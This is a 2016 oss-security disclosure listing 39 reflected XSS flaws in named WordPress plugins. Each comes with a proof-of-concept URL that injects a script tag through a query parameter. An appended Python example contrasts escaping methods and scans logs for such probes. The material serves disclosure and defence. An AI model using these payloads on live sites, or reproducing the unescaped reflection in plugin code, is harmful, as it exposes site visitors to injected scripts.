Date: Tue, 12 Apr 2016 08:48:01 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: Open Source Security <oss-security@...ts.openwall.com>
Subject: 39 XSS vulnerabilities in 35 wordpress plugins.

Hello List,

This was a project I worked on as part of my research in Akamai's SIRT. I initially found 1352 suspect XSS vulnerabilities, but WordPress escapes the GET/POST/REQUEST superglobals
(https://core.trac.wordpress.org/ticket/18322). I didn't know this at the time, so I now have a database of vulnerabilities that are context dependent and would need to be examined
individually. I managed to automate XSS testing against the database, and of the 1352, 39 successfully executed JavaScript. These are those 39; I've manually verified they're still vulnerable.

They're available here: http://www.vapidlabs.com/wp/wp.php

I notified WordPress back in February of my research.


Plugin:https://wordpress.org/plugins/mousewheel-smooth-scroll File:./mousewheel-smooth-scroll/js/wpmss.php Parameter:ease  speed step CVE-2016-77447 PoC:hxxp://[target]/wp-content/plugins/mousewheel-smooth-scroll/js/wpmss.php?step="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/indexisto File:./indexisto/assets/js/indexisto-inject.php Parameter:indexisto_index CVE-2016-77360 PoC:hxxp://[target]/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/prettypre File:./prettypre/prettyprecss.php Parameter:ts CVE-2016-77548 PoC:hxxp://[target]/wp-content/plugins/prettypre/prettyprecss.php?ts="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/whizz File:./whizz/plugins/delete-plugin.php Parameter:plugin CVE-2016-77799 PoC:hxxp://[target]/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/mypuzzle-jigsaw File:./mypuzzle-jigsaw/getGallery.php Parameter:callback CVE-2016-77465 PoC:hxxp://[target]/wp-content/plugins/mypuzzle-jigsaw/getGallery.php?callback="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/anti-plagiarism File:./anti-plagiarism/js.php Parameter:m CVE-2016-77035 PoC:hxxp://[target]/wp-content/plugins/anti-plagiarism/js.php?m="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/qoate-scroll-triggered-box File:./qoate-scroll-triggered-box/assets/js/script.php Parameter:anim perc sac vpos CVE-2016-77559 PoC:hxxp://[target]/wp-content/plugins/qoate-scroll-triggered-box/assets/js/script.php?anim="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/s3-video File:./s3-video/views/video-management/preview_video.php Parameter:media CVE-2016-77600 PoC:hxxp://[target]/wp-content/plugins/s3-video/views/video-management/preview_video.php?media="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/wpsolr-search-engine File:./wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php Parameter:page  tab CVE-2016-77958 PoC:hxxp://[target]/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/page-layout-builder File:./page-layout-builder/includes/layout-settings.php Parameter:layout_settings_id CVE-2016-77503 PoC:hxxp://[target]/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/mypuzzle-sliding File:./mypuzzle-sliding/getGallery.php Parameter:callback CVE-2016-77466 PoC:hxxp://[target]/wp-content/plugins/mypuzzle-sliding/getGallery.php?callback="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/e-search File:./e-search/tmpl/date_select.php Parameter:date-from date-to CVE-2016-77217 PoC:hxxp://[target]/wp-content/plugins/e-search/tmpl/date_select.php?date-from="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/e-search File:./e-search/tmpl/title_az.php Parameter:title_az CVE-2016-77217 PoC:hxxp://[target]/wp-content/plugins/e-search/tmpl/title_az.php?title_az="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/tidio-gallery File:./tidio-gallery/popup-insert-help.php Parameter:galleryId id  tidio-gallery CVE-2016-77727 PoC:hxxp://[target]/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/parsi-font File:./parsi-font/css.php Parameter:font size CVE-2016-77506 PoC:hxxp://[target]/wp-content/plugins/parsi-font/css.php?size="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/defa-online-image-protector File:./defa-online-image-protector/redirect.php Parameter:r CVE-2016-77193 PoC:hxxp://[target]/wp-content/plugins/defa-online-image-protector/redirect.php?r="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/new-year-firework File:./new-year-firework/firework/index.php Parameter:music text url CVE-2016-77475 PoC:hxxp://[target]/wp-content/plugins/new-year-firework/firework/index.php?text="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/simpel-reserveren File:./simpel-reserveren/edit.php Parameter:page CVE-2016-77628 PoC:hxxp://[target]/wp-content/plugins/simpel-reserveren/edit.php?page="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/groupon-widget File:./groupon-widget/widget.css.php Parameter:grpn_wdgt_get_it_btn_background grpn_wdgt_link_color grpn_wdgt_price_tag_background grpn_wdgt_shell_background grpn_wdgt_text_color grpn_wdgt_title_color CVE-2016-77332 PoC:hxxp://[target]/wp-content/plugins/groupon-widget/widget.css.php?grpn_wdgt_shell_background="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/wp-notifications File:./wp-notifications/css/ln_livenotifications_css.php Parameter:banner_bgcolor dropdown_bit_bgcolor dropdown_bit_color dropdown_boder_color dropdown_color dropdown_hover_bgcolor dropdown_link_color CVE-2016-77885 PoC:hxxp://[target]/wp-content/plugins/wp-notifications/css/ln_livenotifications_css.php?dropdown_color="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/wp-latest-posts File:./wp-latest-posts/js/wpcufpn_front.js.php Parameter:id CVE-2016-77873 PoC:hxxp://[target]/wp-content/plugins/wp-latest-posts/js/wpcufpn_front.js.php?id="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/ajax-random-post File:./ajax-random-post/js.php Parameter:count interval CVE-2016-77022 PoC:hxxp://[target]/wp-content/plugins/ajax-random-post/js.php?interval="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/admin-font-editor File:./admin-font-editor/css.php Parameter:font size CVE-2016-77009 PoC:hxxp://[target]/wp-content/plugins/admin-font-editor/css.php?size="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/hdw-tube File:./hdw-tube/playlist.php Parameter:playlist CVE-2016-77337 PoC:hxxp://[target]/wp-content/plugins/hdw-tube/playlist.php?playlist="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/hdw-tube File:./hdw-tube/mychannel.php Parameter:channel CVE-2016-77337 PoC:hxxp://[target]/wp-content/plugins/hdw-tube/mychannel.php?channel="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/lbak-google-checkout File:./lbak-google-checkout/css/googlecheckout.php Parameter:ih iw ph pw tc CVE-2016-77395 PoC:hxxp://[target]/wp-content/plugins/lbak-google-checkout/css/googlecheckout.php?pw="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/razuna-media-manager File:./razuna-media-manager/pages/ajax/razuna-upload-callback.php Parameter:message responsecode CVE-2016-77577 PoC:hxxp://[target]/wp-content/plugins/razuna-media-manager/pages/ajax/razuna-upload-callback.php?responsecode="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/mypuzzle-find-the-pair-a-memory-game File:./mypuzzle-find-the-pair-a-memory-game/ftpair-getCardImages.php Parameter:callback CVE-2016-77464 PoC:hxxp://[target]/wp-content/plugins/mypuzzle-find-the-pair-a-memory-game/ftpair-getCardImages.php?callback="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/surveymonkey-button File:./surveymonkey-button/start_survey.php Parameter:jqueryPepPath CVE-2016-77702 PoC:hxxp://[target]/wp-content/plugins/surveymonkey-button/start_survey.php?jqueryPepPath="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/hero-maps-pro File:./hero-maps-pro/views/dashboard/index.php Parameter:p v CVE-2016-77341 PoC:hxxp://[target]/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/bbpress-social-network File:./bbpress-social-network/css/ln_livenotifications_css.php Parameter:banner_bgcolor dropdown_bit_bgcolor dropdown_bit_color dropdown_boder_color dropdown_color dropdown_hover_bgcolor dropdown_link_color CVE-2016-77074 PoC:hxxp://[target]/wp-content/plugins/bbpress-social-network/css/ln_livenotifications_css.php?dropdown_color="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/bbpress-social-network File:./bbpress-social-network/css/ln_livenotifications_cssback.php Parameter:banner_bgcolor dropdown_bgcolor dropdown_bit_bgcolor dropdown_bit_color dropdown_boder_color dropdown_color dropdown_hover_bgcolor dropdown_link_color CVE-2016-77074 PoC:hxxp://[target]/wp-content/plugins/bbpress-social-network/css/ln_livenotifications_cssback.php?dropdown_bgcolor="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/photoxhibit File:./photoxhibit/common/inc/pages/edit_styles.php Parameter:gid CVE-2016-77517 PoC:hxxp://[target]/wp-content/plugins/photoxhibit/common/inc/pages/edit_styles.php?gid="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/photoxhibit File:./photoxhibit/common/inc/pages/build.php Parameter:gid CVE-2016-77517 PoC:hxxp://[target]/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/pondol-formmail File:./pondol-formmail/pages/admin-mail-info.php Parameter:itemid CVE-2016-77532 PoC:hxxp://[target]/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/heat-trackr File:./heat-trackr/heat-trackr_abtest_add.php Parameter:id N  WPSLT CVE-2016-77339 PoC:hxxp://[target]/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/tidio-form File:./tidio-form/popup-insert-help.php Parameter:formId id  tidio-form CVE-2016-77726 PoC:hxxp://[target]/wp-content/plugins/tidio-form/popup-insert-help.php?formId="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/simplified-content File:./simplified-content/ooawpframework/js/ajax/OOAAjax.js.php Parameter:ajaxURL CVE-2016-77642 PoC:hxxp://[target]/wp-content/plugins/simplified-content/ooawpframework/js/ajax/OOAAjax.js.php?ajaxURL="><script>alert(1);</script><"
Plugin:https://wordpress.org/plugins/infusionsoft File:./infusionsoft/Infusionsoft/examples/leadscoring.php Parameter:ContactId CVE-2016-77364 PoC:hxxp://[target]/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId="><script>alert(1);</script><"
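The post's point that the remaining findings are "context dependent" is worth making concrete for plugin authors and reviewers. The PoC URLs above all hit PHP files directly under wp-content/plugins, so whatever WordPress does to its superglobals when it bootstraps does not apply to them; and even where it does apply, backslash-quoting of request data is not HTML output encoding. The following added example (not code from the advisory or from any of the listed plugins) models that quoting as PHP addslashes-style escaping, renders the advisory's own payload into an HTML attribute with three strategies, and shows which ones still leave a live script tag. A second function scans constructed access-log lines for the same reflected probe so a defender can find attempts against these paths. The addslashes model, the attribute template and the log lines are all my assumptions, constructed for this example.

```python
import html
import urllib.parse

# Payload taken verbatim from the PoC URLs in the advisory.
PAYLOAD = '"><script>alert(1);</script><"'


def addslashes(s: str) -> str:
    """Model of PHP addslashes(): backslash-quote ", ', \\ and NUL.

    Assumption for this example: this is the kind of quoting applied to
    request superglobals. It targets string literals, not HTML, so a
    browser still sees the raw angle brackets and a closing quote.
    """
    out = []
    for ch in s:
        if ch in ('"', "'", "\\"):
            out.append("\\" + ch)
        elif ch == "\x00":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def render_attr(value: str) -> str:
    """Reflect a request value into a double-quoted HTML attribute (constructed template)."""
    return f'<input name="step" value="{value}">'


def reflects_script_tag(markup: str) -> bool:
    """Crude check: does a literal <script> tag survive in the rendered output?"""
    return "<script>" in markup.lower()


def compare_escapers(payload: str) -> dict:
    """Render the payload with no escaping, slash-escaping, and context-aware
    HTML escaping; True means a script tag is still live in the output."""
    return {
        "raw": reflects_script_tag(render_attr(payload)),
        "addslashes": reflects_script_tag(render_attr(addslashes(payload))),
        # html.escape with quote=True is the Python equivalent of
        # htmlspecialchars(..., ENT_QUOTES) / esc_attr() for an attribute context.
        "html_escape": reflects_script_tag(render_attr(html.escape(payload, quote=True))),
    }


# Constructed access-log lines in Apache combined-style format (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Apr/2016:08:48:01 -0400] "GET /wp-content/plugins/mousewheel-smooth-scroll/js/wpmss.php'
    '?step=%22%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E%3C%22 HTTP/1.1" 200 512',
    '10.0.0.6 - - [12/Apr/2016:08:49:10 -0400] "GET /wp-content/plugins/mousewheel-smooth-scroll/js/wpmss.php'
    '?step=5 HTTP/1.1" 200 512',
]


def find_reflected_xss_probes(lines):
    """Return the request paths whose URL-decoded query string carries a script
    tag or javascript: URL, i.e. probes of the kind shown in the PoCs above."""
    hits = []
    for line in lines:
        try:
            request = line.split('"')[1]      # the quoted "METHOD path HTTP/x" field
            target = request.split(" ")[1]
        except IndexError:
            continue
        query = urllib.parse.unquote_plus(target).partition("?")[2].lower()
        if "<script" in query or "javascript:" in query:
            hits.append(target.partition("?")[0])
    return hits


if __name__ == "__main__":
    for name, live in compare_escapers(PAYLOAD).items():
        print(f"{name:12s} script tag still live: {live}")
    print("probed paths:", find_reflected_xss_probes(SAMPLE_LOG))
```

Running it shows that only the context-aware escaper neutralises the payload in an attribute; slash-quoting leaves `\"><script>…` in the page, and the browser closes the attribute at the first quote regardless of the backslash. The log scanner is deliberately simple (substring match on the decoded query); it is enough to pull these specific probes out of a log, not a general XSS detector.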
